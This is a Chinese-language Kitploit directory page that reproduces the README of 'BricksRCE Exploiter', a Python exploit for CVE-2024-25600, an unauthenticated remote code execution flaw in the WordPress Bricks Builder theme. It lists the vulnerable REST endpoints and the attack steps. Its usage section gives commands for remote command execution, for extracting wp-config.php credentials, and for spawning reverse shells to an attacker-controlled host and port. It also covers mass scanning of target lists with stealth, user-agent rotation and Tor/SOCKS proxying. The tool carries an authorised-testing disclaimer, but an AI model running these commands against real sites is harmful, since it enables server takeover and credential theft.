Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - WordPress Bricks Builder主题的未认证RCE漏洞利用。高级漏洞利用框架,具有交互式shell、反向shell、文件上传/下载、异步扫描、隐身模式、代理支持和多线程漏洞扫描。仅用于授权安全测试。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
侦察漏洞扫描器漏洞利用ShellcodeWeb应用程序漏洞利用信息收集渗透测试命令与控制红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

CVE-2024-25600 - WordPress Bricks Builder主题的未认证RCE漏洞利用。高级漏洞利用框架,具有交互式shell、反向shell、文件上传/下载、异步扫描、隐身模式、代理支持和多线程漏洞扫描。仅用于授权安全测试。

查看仓库
1162个月前尚未审核

BricksRCE Exploiter

CVE-2024-25600 — WordPress Bricks Builder 未认证远程代码执行

Python 版本 CVSS CVE 许可证 平台

CVE-2024-25600 授权安全评估工具
作者:Sudeepa Wanigarathna · 工具:BricksRCE Exploiter v1.0
主脚本:cve-2024-25600.py

b

[!IMPORTANT] 仅限授权使用。 本工具仅用于安全研究、教育以及测试您拥有或已获得明确书面许可的系统。未经授权访问计算机系统是非法的。作者对滥用行为不承担任何责任。


目录

  • 概述
  • 漏洞详情
  • 功能
  • 安装
  • 快速开始
  • 使用指南
  • 命令参考
  • 交互式Shell
  • 输出与日志
  • 故障排除
  • 仓库结构
  • 版本历史
  • 免责声明
  • 作者与致谢
  • 许可证

概述

CVE-2024-25600 是 WordPress Bricks Builder 主题中的一个严重、未认证的远程代码执行漏洞。在 render_element REST 端点中对用户控制的输入处理不当,允许未认证的攻击者在受影响的目标上执行任意 PHP/系统命令。

BricksRCE Exploiter(cve-2024-25600.py)是一款功能全面的 Python 评估工具,供授权安全专业人员使用,用于:

  • 检测存在漏洞的 Bricks Builder 安装
  • 通过受控命令执行验证影响
  • 通过交互式 shell 与被入侵主机交互
  • 使用异步/线程工作器批量扫描目标列表
  • 导出结构化结果用于报告

漏洞详情

属性值
CVE IDCVE-2024-25600
CVSS9.8(严重)
攻击向量网络——未认证
影响完全远程代码执行,危及机密性/完整性/可用性
受影响产品WordPress Bricks Builder 主题
受影响版本Bricks ≤ 1.9.6(已在 1.9.6.1+ 中修补)
漏洞类型未认证远程代码执行
CWECWE-94(代码生成控制不当)

受影响的端点

端点方法
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

攻击总结

  1. 从目标页面源码中提取 Bricks nonce
  2. 提交一个包含恶意元素 payload 的精心构造的 render_element 请求
  3. 服务器端代码评估导致任意命令执行

参考

  • CVE-2024-25600 (MITRE)
  • NVD 条目
  • Bricks Builder 更新日志/安全公告

功能

核心能力

能力描述
漏洞检测通过受控标记探测确认 RCE
Nonce 提取多种 nonce 发现方式(脚本、页面源码、meta、REST)
版本检测从 CSS / readme / REST 识别 Bricks Builder 版本
交互式 Shell完整的 REPL,支持历史记录、自动补全和文件传输
单命令模式执行一条命令后退出(便于脚本化使用)
反弹 Shell 辅助生成 bash / nc / Python / PHP / Perl / Ruby 反弹 shell
wp-config 提取尝试定位并读取 wp-config.php
批量扫描从 URL 列表中异步或线程化多目标扫描

操作控制

能力描述
速率限制请求间可配置延迟
重试逻辑超时和连接错误时指数退避
User-Agent 轮换每个请求随机生成浏览器指纹
隐身模式随机化 Accept-Language / Accept-Encoding 头
代理支持HTTP、HTTPS、SOCKS5 / SOCKS5h
双端点优先使用 wp-json、rest_route 或两者
强制模式跳过预检查,直接尝试利用
富 CLI通过 Rich 实现进度条、表格和彩色面板

报告

能力描述
JSON / TXT 导出保存扫描结果和受感染目标
命令历史可选的已执行命令日志
文件日志持久化 bricks_rce.log 及自定义日志路径

安装

前提条件

  • Python 3.8+
  • pip
  • 能够网络访问授权目标

安装步骤

git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

依赖

requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # 可选 — SOCKS5 代理支持

快速开始

将 https://target.example 替换为实验环境或已授权的目标。

# 交互式 Shell
python3 cve-2024-25600.py -u https://target.example

# 单命令
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# 批量扫描
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# 版本检测
python3 cve-2024-25600.py -u https://target.example --detect-version

# 通过 Burp 代理
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

使用指南

所有示例均使用主脚本:cve-2024-25600.py

1. 查看帮助

python3 cve-2024-25600.py --help

2. 单目标交互式 Shell

在确认目标存在漏洞后,打开一个交互式 RCE Shell。

python3 cve-2024-25600.py -u https://target.example

工作流程:

  1. 规范化并验证 URL
  2. 从页面提取 nonce
  3. 验证漏洞(除非指定 --force)
  4. 进入交互式 Shell

3. 执行单条命令

python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

将命令输出保存到文件:

python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. 选择 Payload 类型

# 默认 PHP 异常型 payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system() 型 payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. 检测 Bricks Builder 版本

python3 cve-2024-25600.py -u https://target.example --detect-version

与命令结合使用:

python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. 提取 wp-config.php

python3 cve-2024-25600.py -u https://target.example --extract-wp-config

成功时保存为 wp-config_<target>.txt。

7. 反弹 Shell(仅限授权的实验环境)

# 终端 1 — 监听器
nc -lvnp 4444

# 终端 2 — bash 反弹 Shell
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

所有支持的反弹 Shell 类型:

python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. 强制模式(跳过漏洞检查)

python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. 从文件批量扫描

# targets.txt — 每行一个 URL
python3 cve-2024-25600.py -f targets.txt

带线程、延迟、隐身模式和 JSON 输出:

python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

同步(线程池)扫描(替代异步):

python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

静默批量扫描:

python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. 端点选择

# 两个端点(默认)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# 仅 /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# 仅 /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. 隐身模式

python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20

12. 自定义 User-Agent

# 自定义 UA
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# 禁用随机 UA 轮换
python3 cve-2024-25600.py -u https://target.example --no-random-ua

13. 代理支持

# HTTP 代理(例如 Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# SOCKS5 代理
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h(通过代理/Tor 进行 DNS 解析)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050

14. SSL 验证

# 启用 SSL 证书验证(默认禁用)
python3 cve-2024-25600.py -u https://target.example --verify-ssl

15. 输出与日志

下载工具